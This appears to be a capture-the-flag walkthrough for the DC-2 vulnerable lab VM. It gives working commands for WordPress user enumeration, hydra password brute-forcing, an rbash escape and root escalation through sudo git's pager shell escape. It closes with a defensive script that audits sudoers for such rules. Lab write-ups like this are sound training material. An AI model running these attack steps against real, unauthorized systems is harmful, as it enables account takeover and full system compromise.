Target machine information

DESCRIPTION
Much like DC-1, DC-2 is another purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing.

As with the original DC-1, it's designed with beginners in mind.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

Just like with DC-1, there are five flags including the final flag.

And again, just like with DC-1, the flags are important for beginners, but not so important for those who have experience.

In short, the only flag that really counts, is the final flag.

For beginners, Google is your friend. Well, apart from all the privacy concerns etc etc.

I haven't explored all the ways to achieve root, as I scrapped the previous version I had been working on, and started completely fresh apart from the base OS install.

TECHNICAL INFORMATION
DC-2 is a VirtualBox VM built on Debian 32 bit, so there should be no issues running it on most PCs.

While I haven't tested it within a VMware environment, it should also work.

It is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP.

Installation is simple - download it, unzip it, and then import it into VirtualBox and away you go.

Please note that you will need to set the hosts file on your pentesting device to something like:

192.168.0.145 dc-2

Obviously, replace 192.168.0.145 with the actual IP address of DC-2.

It will make life a whole lot simpler (and a certain CMS may not work without it).

If you're not sure how to do this, instructions are here.

IMPORTANT
While there should be no problems using this VM, by downloading it, you accept full responsibility for any unintentional damage that this VM may cause.

In saying that, there shouldn't be any problems, but I feel the need to throw this out there just in case.

CONTACT
This is the second vulnerable lab challenge that I've created, so feel free to let me know what you think of it.

I'm also very interested in hearing how people go about solving these challenges, so if you're up for writing a walkthrough, please do so and send me a link, or alternatively, follow me on Twitter, and DM me (you can unfollow after you've DM'd me if you'd prefer).

I can be contacted via Twitter - @DCAU7

Information gathering

After deploying the target VM, ping-scan the subnet with nmap to find the live IPs: one is Kali's own address, the other is the target. Then scan the target for open ports.

# ping-scan the subnet for live hosts (-sP is the old alias of -sn)
nmap -sP 10.0.0.0/24
# scan all TCP ports on the target and detect service versions
nmap -sV -p- 10.0.0.18


Port 80 is open, so open it in a browser. The site redirects to http://dc-2, so add a resolution entry to the system hosts file (e.g. 10.0.0.18 dc-2) before it will load.


There is no robots.txt.


The footer of the site shows it is running WordPress; searching for wordpress in msfconsole returns many modules.


flag1


Following the flag1 hint, use cewl to crawl the site and build a password wordlist from its content:

cewl http://dc-2 -w pass.dic

Use wpscan to enumerate the WordPress users (-e u):

wpscan --url http://dc-2 -e u


flag2

Put the enumerated usernames into a user wordlist (user.dic) for the brute-force attempt.


Use hydra against the login form. The form string must be quoted (it contains a space and & characters), and the last field is the string that appears on a failed login (login_error):

hydra -L user.dic -P pass.dic -V -o wordpress.txt dc-2 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:login_error"


After logging in to WordPress as jerry, flag2 is found.


flag3

Try the recovered credentials against SSH on port 7744; only tom's account can log in.


The shell is rbash, so cat cannot be used directly to read the flag; use vi instead, or break out of the rbash restrictions with the commands below. (Newer bash releases refuse to assign a path containing a slash to BASH_CMDS in restricted mode; in that case the vi route is the fallback.)

# the r stands for restricted
BASH_CMDS[a]=/bin/sh;a
# rbash also locks PATH; restore it once in the unrestricted shell
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin


flag4

/etc/passwd shows a jerry account exists; following the flag3 hint, use su to switch to jerry.


su jerry


flag5

Following the flag4 hint, git turns out to be runnable as root through sudo without a password.


# either command makes git open its pager (less) as root
sudo git -p --help
sudo git help config
# inside the pager, type ! followed by a command to run it as root
!whoami
!/bin/bash

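The git escalation above works because sudo lets git spawn its pager, and the pager's ! escape spawns a shell. The following is an added example, not part of the original walkthrough and not DC-2's real sudoers: a small audit function that reads sudoers-format rules and flags entries granting binaries known to spawn shells (git, vi, less, find, ...) unless the rule carries the NOEXEC tag, which blocks the child exec and so the pager escape. The sample rules are constructed; tags are tracked across a comma-separated command list as sudoers does, but aliases are not expanded.

```shell
#!/bin/sh
# Added example: audit sudoers rules for shell-escape-capable binaries.
# Not from the DC-2 walkthrough; the sample rules below are constructed.

# Binaries whose sudo shell escapes are well known (constructed, not exhaustive).
SHELL_ESCAPE_BINS="git vi vim less more man find awk python perl bash sh"

# find_risky_sudo_rules: read sudoers text on stdin, print "user binary TAG"
# for every command entry that names a binary from the list above and is not
# protected by NOEXEC. Comments, Defaults, @include and alias lines are skipped.
find_risky_sudo_rules() {
    awk -v bins="$SHELL_ESCAPE_BINS" '
    BEGIN { n = split(bins, b, " "); for (i = 1; i <= n; i++) risky[b[i]] = 1 }
    /^[ \t]*#/ || /^[ \t]*$/ || /^[ \t]*@/ || /^Defaults/ || /_Alias/ { next }
    /=/ {
        user = $1
        spec = $0
        sub(/^[^=]*=[ \t]*/, "", spec)        # drop "user HOST=" prefix
        sub(/^\([^)]*\)[ \t]*/, "", spec)     # drop "(runas)" list
        ncmd = split(spec, cmds, ",")
        nopass = 0; noexec = 0                # tags persist along the list
        for (i = 1; i <= ncmd; i++) {
            cmd = cmds[i]
            if (cmd ~ /NOPASSWD:/) nopass = 1; else if (cmd ~ /PASSWD:/) nopass = 0
            if (cmd ~ /NOEXEC:/)   noexec = 1; else if (cmd ~ /EXEC:/)   noexec = 0
            gsub(/[A-Z]+:[ \t]*/, "", cmd)    # strip the tags themselves
            sub(/^[ \t]+/, "", cmd)
            split(cmd, w, " ")
            bin = w[1]; sub(/.*\//, "", bin)  # basename of the command path
            if ((bin in risky) && !noexec)
                print user, bin, (nopass ? "NOPASSWD" : "PASSWD")
        }
    }'
}

# audit_sample: run the audit over a constructed sudoers file. The jerry/tom
# git rules mirror the kind of rule found on the target; the www-data rule shows
# the NOEXEC mitigation that keeps git from launching its pager at all.
audit_sample() {
    cat <<'EOF' | find_risky_sudo_rules
# constructed sample sudoers
Defaults env_reset
root     ALL=(ALL:ALL) ALL
jerry    ALL=(root) NOPASSWD: /usr/bin/git
tom      ALL=(root) NOPASSWD: /usr/bin/git, /usr/bin/vi
www-data ALL=(root) NOPASSWD: NOEXEC: /usr/bin/git
alice    ALL=(root) /bin/systemctl restart nginx
EOF
}

# Run the constructed sample when executed directly.
# On a real host (as root): cat /etc/sudoers /etc/sudoers.d/* | find_risky_sudo_rules
audit_sample
```

Expected lines from the sample are jerry git NOPASSWD, tom git NOPASSWD and tom vi NOPASSWD; the www-data rule is silent because NOEXEC is set, and alice is silent because systemctl is not on the list. The fix for a rule like jerry's is either to drop it or to add NOEXEC, keeping in mind that NOEXEC also breaks legitimate git subcommands that exec helpers.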